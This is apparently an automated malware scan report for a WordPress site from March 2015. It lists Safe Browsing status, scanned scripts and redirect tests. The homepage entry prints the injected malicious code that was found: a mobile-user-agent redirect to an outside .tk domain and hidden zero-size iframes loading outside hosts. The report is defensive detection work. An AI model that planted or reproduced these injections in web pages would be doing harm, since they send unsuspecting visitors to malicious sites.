Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=omniroyalsolutions.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
| Request | Server response | Status |
http://www.omniroyalsolutions.com/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Fri, 06 Mar 2015 17:17:13 GMT Location: http://omniroyalsolutions.com/ Server: Apache/2.4.12 (Unix) OpenSSL/1.0.1e-fips mod_bwlimited/1.4 mod_fcgid/2.3.10-dev Vary: User-Agent Content-Length: 0 Content-Type: text/html; charset=UTF-8 X-Pingback: http://omniroyalsolutions.com/xmlrpc.php X-Powered-By: PHP/5.4.37 | clean |
http://omniroyalsolutions.com/ | 200 OK Content-Length: 43411 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) if(navigator.userAgent.match(/(android|midp|j2me|symbian|series 60|symbos|windows mobile|windows ce|ppc|smartphone|blackberry|mtk|bada|windows phone|iphone|ipad)/i)!==null){ window.location = "http://azzm.tk/?3"; } Decoded script: <iframe src="http://bimis.ml/?1" width="0" height="0" align="left"></iframe> Antivirus reports:
Malicious iFrame found. size: 0x0 src: http://erreco.com/traffic3.php This URL is marked by Google as suspicious <iframe src="http://erreco.com/traffic3.php" width="0" height="0" frameborder="0"> Hidden iFrame found. size: 0x0 src: http://bimis.ml/?1 <iframe src="http://bimis.ml/?1" width="0" height="0" align="left"> | ||
http://omniroyalsolutions.com/wp-includes/js/jquery/jquery.js?ver=1.10.2 | 200 OK Content-Length: 93085 Content-Type: application/javascript | clean |
http://omniroyalsolutions.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1 | 200 OK Content-Length: 7200 Content-Type: application/javascript | clean |
http://omniroyalsolutions.com/wp-content/plugins/google-map-shortcode/js/gmshc.2.3.min.js?ver=3.8.5 | 200 OK Content-Length: 6347 Content-Type: application/javascript | clean |
http://maps.google.com/maps/api/js?sensor=false&language=en&ver=3.8.5 | 200 OK Content-Length: 4212 Content-Type: text/javascript | clean |
http://omniroyalsolutions.com/wp-content/themes/icemagtheme/js/jquery.easing.1.3.js?ver%5B0%5D=jquery | 200 OK Content-Length: 8305 Content-Type: application/javascript | clean |
http://omniroyalsolutions.com/wp-content/themes/icemagtheme/js/jquery-ui.min.js?ver%5B0%5D=jquery | 200 OK Content-Length: 202335 Content-Type: application/javascript | clean |
http://omniroyalsolutions.com/wp-content/themes/icemagtheme/js/jquery.quicksand.js?ver%5B0%5D=jquery | 200 OK Content-Length: 15003 Content-Type: application/javascript | clean |
http://omniroyalsolutions.com/wp-content/themes/icemagtheme/js/jsapi.js?ver%5B0%5D=jquery | 200 OK Content-Length: 24572 Content-Type: application/javascript | clean |
http://omniroyalsolutions.com/wp-content/themes/icemagtheme/js/icemag.basic.slider.1.0.js?ver%5B0%5D=jquery | 200 OK Content-Length: 6556 Content-Type: application/javascript | clean |
http://omniroyalsolutions.com/wp-content/themes/icemagtheme/js/jquery.default.1.0.js?ver%5B0%5D=jquery | 200 OK Content-Length: 23137 Content-Type: application/javascript | clean |
http://omniroyalsolutions.com/wp-content/themes/icemagtheme/js/jquery.default.load.1.0.js?ver%5B0%5D=jquery | 200 OK Content-Length: 12239 Content-Type: application/javascript | clean |
http://omniroyalsolutions.com/wp-content/themes/icemagtheme/plugins/LayerSlider/js/layerslider.kreaturamedia.jquery.js?ver=3.5.0 | 200 OK Content-Length: 25327 Content-Type: application/javascript | clean |
http://omniroyalsolutions.com/wp-content/themes/icemagtheme/plugins/LayerSlider/js/jquery-easing-1.3.js?ver=1.3.0 | 200 OK Content-Length: 8305 Content-Type: application/javascript | clean |
http://omniroyalsolutions.com/wp-content/plugins/prettyphoto-media/js/jquery.prettyPhoto.min.js?ver=3.1.4 | 200 OK Content-Length: 21027 Content-Type: application/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: omniroyalsolutions.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 06 Mar 2015 17:17:16 GMT
Server: Apache/2.4.12 (Unix) OpenSSL/1.0.1e-fips mod_bwlimited/1.4 mod_fcgid/2.3.10-dev
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=UTF-8
X-Pingback: http://omniroyalsolutions.com/xmlrpc.php
X-Powered-By: PHP/5.4.37
GET / HTTP/1.1
Host: omniroyalsolutions.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 06 Mar 2015 17:17:16 GMT
Server: Apache/2.4.12 (Unix) OpenSSL/1.0.1e-fips mod_bwlimited/1.4 mod_fcgid/2.3.10-dev
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=UTF-8
X-Pingback: http://omniroyalsolutions.com/xmlrpc.php
X-Powered-By: PHP/5.4.37
Second query (visit from search engine):
GET / HTTP/1.1
Host: omniroyalsolutions.com
Referer: http://www.google.com/search?q=omniroyalsolutions.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: omniroyalsolutions.com
Referer: http://www.google.com/search?q=omniroyalsolutions.com
Result:
The result is similar to the first query. There are no suspicious redirects found.